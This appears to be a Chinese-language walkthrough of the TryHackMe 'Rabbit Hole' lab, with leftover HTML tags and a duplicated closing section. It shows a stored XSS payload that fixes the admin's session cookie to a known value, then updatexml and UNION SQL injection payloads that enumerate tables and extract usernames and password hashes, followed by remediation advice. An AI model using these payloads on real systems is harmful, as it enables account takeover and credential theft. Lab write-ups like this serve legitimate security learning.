TryHackMe “Rabbit Hole” 挑战教学文档<\/strong><\/h3>
文档概述<\/strong><\/h4>
本教学文档基于 TryHackMe 的 “Rabbit Hole” 实战挑战，详细讲解了一个结合了 XSS（跨站脚本攻击）<\/strong> 和 SQL注入<\/strong> 的经典漏洞链利用案例。核心攻击路径是：通过一个存储型XSS漏洞窃取管理员会话，然后在管理员访问的页面中挖掘并利用SQL注入漏洞，最终从数据库提取敏感信息。<\/p>
目标环境<\/strong>：一个存在多个漏洞的Web应用程序。
核心知识点<\/strong>：信息收集、XSS、Cookie会话管理、SQL注入（基于错误的注入、UNION查询）。
技术栈<\/strong>：PHP、MariaDB\/MySQL。<\/p>

第一阶段：信息收集与初步侦查<\/strong><\/h3>

端口扫描<\/strong><\/p>

操作<\/strong>：使用 nmap<\/code> 等工具对目标进行端口扫描。<\/li>
结果<\/strong>：确认目标开放了HTTP服务（端口80）。这是后续所有攻击的入口点。<\/li> <\/ul> <\/li>
Web应用探测<\/strong><\/p> 访问80端口<\/strong>：发现一个Web应用。<\/li> 发现关键端点<\/strong>： \/login.php<\/code>：用户登录页面。提示“不能使用暴力破解”，暗示此处可能存在账户锁定或其他防御机制。<\/li> \/register.php<\/code>：用户注册页面。这是获取初始访问权限的关键。<\/li> <\/ul> <\/li> 参数识别<\/strong>：通过拦截登录请求，发现login.php<\/code>使用POST方法传递参数 username<\/code> 和 password<\/code>。<\/li> <\/ul> <\/li> <\/ol> 第二阶段：获取立足点 - 利用XSS劫持管理员会话<\/strong><\/h3> 这是本挑战最精妙的部分，涉及一个多步骤的攻击链。<\/p> 注册普通用户<\/strong><\/p> 操作<\/strong>：通过 \/register.php<\/code> 页面注册一个新账号（例如，用户名为 test<\/code>）。<\/li> 目的<\/strong>：获得一个合法的应用程序身份，以便访问登录后的功能。<\/li> <\/ul> <\/li> 登录后发现关键信息<\/strong><\/p> 登录后观察<\/strong>：页面显示了当前登录的用户名（例如，“Welcome, test”）。<\/li> 页面提示，除了自己创建的账号外，系统中还存在其他3个账号，其中一个是 admin<\/code>。<\/li> 核心发现<\/strong>：系统存在一个存储型XSS漏洞<\/strong>，因为用户名在未经过滤的情况下被直接输出到HTML页面中。<\/li> <\/ul> <\/li> 另一个关键发现（会话管理缺陷）<\/strong>：作者发现，在多次登录和退出后，会话Cookie（PHPSESSID）保持不变<\/strong>。<\/li> 更重要的提示是：admin账号会每分钟自动登录一次<\/strong>。这意味着admin会定期触发任何存储在其视图中的XSS payload。<\/li> <\/ul> <\/li> <\/ul> <\/li> 构造XSS Payload劫持会话<\/strong><\/p> 攻击逻辑<\/strong>：由于admin会定期访问页面，并且页面会显示所有用户名，我们可以将用户名修改为一个恶意的JavaScript代码。当admin登录时，该代码会在其浏览器中执行，从而将admin的会话Cookie替换为我们已知的Cookie值。这样，我们就能以admin身份登录。<\/li> Payload 构造<\/strong>： <<\/span>script<\/span>><\/span> <\/span><\/span> document.cookie<\/span> =<\/span> "PHPSESSID=已知的会话ID; path=\/"<\/span>; <\/span><\/span> location<\/span>.reload<\/span>(); \/\/ 可选：重新加载页面以确保新会话ID生效 <\/span><\/span><\/span><\/span><<\/span>\/script><\/span> <\/span><\/span><\/code><\/pre><\/li> 攻击步骤<\/strong>：将用户名修改为上述XSS Payload。这里的“已知的会话ID”是攻击者（我们）自己当前会话的 PHPSESSID<\/code> 值。<\/li> 等待最多一分钟，admin账号自动登录。admin浏览器执行我们的XSS代码，将其会话Cookie篡改成我们的Cookie。<\/li> 此时，在浏览器中，我们仍然使用原来的会话。由于admin的会话已经被我们“劫持”（变成了和我们一样的值），我们刷新页面或重新访问应用，就会以admin权限登录。<\/li> <\/ol> <\/li> <\/ul> <\/li> <\/ol> 第三阶段：权限提升与数据提取 - 利用SQL注入<\/strong><\/h3> 在以admin身份登录后，攻击进入下一阶段。<\/p> 发现SQL注入点<\/strong><\/p> 位置<\/strong>：在admin才能访问的某个功能页面中（通常是用户查询或日志查看等功能）。<\/li> 探测<\/strong>：作者通过提交参数 1"<\/code> 进行测试，触发了数据库错误。这表明注入点存在，并且使用双引号<\/strong>作为字符串分隔符。这是一个基于错误的SQL注入<\/strong>。<\/li> <\/ul> <\/li> 利用SQL注入进行信息收集<\/strong><\/p> 步骤1：确认字段数<\/strong> Payload<\/strong>: 1" UNION SELECT 1,2 -- <\/code><\/li> 分析<\/strong>：使用 UNION SELECT<\/code> 需要前后查询的列数一致。通过不断增加 SELECT<\/code> 后的数字，直到页面正常回显，确定查询结果为2列。<\/li> <\/ul> <\/li> 步骤2：利用updatexml<\/code>进行错误回显注入<\/strong> 由于页面可能不直接显示UNION查询的结果，可以利用MariaDB\/MySQL的 updatexml<\/code> 函数触发错误，并将查询结果带到错误信息中。<\/li> 爆数据库名<\/strong>： 1<\/span>" and updatexml(1, concat(0x7e, (select database()), 0x7e), 1) -- + <\/span><\/span><\/span><\/code><\/pre> 0x7e<\/code> 是波浪号 ~<\/code> 的十六进制，用于在错误信息中清晰地分隔出我们想要的数据。<\/li> <\/ul> <\/li> 爆表名<\/strong>： 1<\/span>" and updatexml(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x7e), 1) -- + <\/span><\/span><\/span><\/code><\/pre> 结果<\/strong>：得到表名 users<\/code> 和 logins<\/code>。<\/li> <\/ul> <\/li> 爆字段名（列名）<\/strong>： 1<\/span>" and updatexml(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name='users'), 0x7e), 1) -- + <\/span><\/span><\/span><\/code><\/pre> 结果<\/strong>：得到 users<\/code> 表的列，如 username<\/code>, password<\/code> 等。<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ul> <\/li> 提取敏感数据（用户名和密码）<\/strong><\/p> 爆用户名<\/strong>： 1<\/span>" and updatexml(1, concat(0x7e, (select group_concat(username) from users), 0x7e), 1) -- + <\/span><\/span><\/span><\/code><\/pre> 结果<\/strong>：~admin,foo,bar,1...<\/code>（由于 updatexml<\/code> 的长度限制，显示不全）。<\/li> <\/ul> <\/li> 爆密码哈希<\/strong>： 1<\/span>" and updatexml(1, concat(0x7e, (select group_concat(password) from users), 0x7e), 1) -- + <\/span><\/span><\/span><\/code><\/pre> 结果<\/strong>：得到不完整的密码哈希串，如 ~0e3ab8e45ac1163c2343990e427c...<\/code>。<\/li> <\/ul> <\/li> 解决显示限制<\/strong>：使用 substring<\/code> 或 mid<\/code> 函数分段获取完整数据。 1<\/span>" UNION SELECT 1, SUBSTRING((SELECT group_concat(password) FROM users), 1, 50) -- + <\/span><\/span><\/span><\/code><\/pre> 通过改变 SUBSTRING<\/code> 的起始位置和长度，可以逐段获取所有用户的密码哈希值。<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 漏洞总结与修复建议<\/strong><\/h3> 漏洞类型<\/th> 危害<\/th> 修复建议<\/th> <\/tr> <\/thead> 存储型XSS<\/strong><\/td> 攻击者可劫持其他用户（包括管理员）会话，执行恶意操作。<\/td> 对所有用户输入进行严格的输出编码（如HTML转义）。使用内容安全策略（CSP）。<\/td> <\/tr> 不安全的会话管理<\/strong><\/td> 会话ID固定不变，容易被劫持后长期利用。<\/td> 实现会话轮换，用户登录后和权限变更时生成新的会话ID。<\/td> <\/tr> SQL注入<\/strong><\/td> 攻击者可读取、修改、删除数据库中的敏感数据。<\/td> 使用参数化查询（预编译语句），避免直接拼接用户输入到SQL命令中。<\/td> <\/tr> 信息泄露<\/strong><\/td> 提示admin的自动登录行为，为攻击者提供了时间窗口信息。<\/td> 避免在前端向普通用户透露不必要的系统内部行为。<\/td> <\/tr> <\/tbody> <\/table> 学习要点与技巧<\/strong><\/h3> 漏洞链思维<\/strong>：单一漏洞可能无法直接实现目标，但将多个低危或中危漏洞组合起来（如XSS + 会话缺陷 + SQL注入）可能形成一条完整的高危攻击链。<\/li> 耐心观察<\/strong>：成功的渗透测试依赖于对应用行为的细致观察，例如页面回显、错误信息、Cookie变化、系统提示等。<\/li> 自动化脚本<\/strong>：文中提到可以编写脚本批量注册和登录，这是一种在真实测试中提高效率的方法。<\/li> 利用系统视图<\/strong>：information_schema<\/code> 数据库是SQL注入时枚举数据库结构的强大工具。<\/li> <\/ol> 此文档完整还原了“Rabbit Hole”挑战的核心技术流程，希望对您的网络安全学习有所帮助。<\/p>

漏洞类型<\/th>	危害<\/th>	修复建议<\/th> <\/tr> <\/thead>
存储型XSS<\/strong><\/td>	攻击者可劫持其他用户（包括管理员）会话，执行恶意操作。<\/td>	对所有用户输入进行严格的输出编码（如HTML转义）。使用内容安全策略（CSP）。<\/td> <\/tr>
不安全的会话管理<\/strong><\/td>	会话ID固定不变，容易被劫持后长期利用。<\/td>	实现会话轮换，用户登录后和权限变更时生成新的会话ID。<\/td> <\/tr>
SQL注入<\/strong><\/td>	攻击者可读取、修改、删除数据库中的敏感数据。<\/td>	使用参数化查询（预编译语句），避免直接拼接用户输入到SQL命令中。<\/td> <\/tr>
信息泄露<\/strong><\/td>	提示admin的自动登录行为，为攻击者提供了时间窗口信息。<\/td>	避免在前端向普通用户透露不必要的系统内部行为。<\/td> <\/tr> <\/tbody> <\/table> 学习要点与技巧<\/strong><\/h3> 漏洞链思维<\/strong>：单一漏洞可能无法直接实现目标，但将多个低危或中危漏洞组合起来（如XSS + 会话缺陷 + SQL注入）可能形成一条完整的高危攻击链。<\/li> 耐心观察<\/strong>：成功的渗透测试依赖于对应用行为的细致观察，例如页面回显、错误信息、Cookie变化、系统提示等。<\/li> 自动化脚本<\/strong>：文中提到可以编写脚本批量注册和登录，这是一种在真实测试中提高效率的方法。<\/li> 利用系统视图<\/strong>：`information_schema<\/code> 数据库是SQL注入时枚举数据库结构的强大工具。<\/li> <\/ol> 此文档完整还原了“Rabbit Hole”挑战的核心技术流程，希望对您的网络安全学习有所帮助。<\/p>`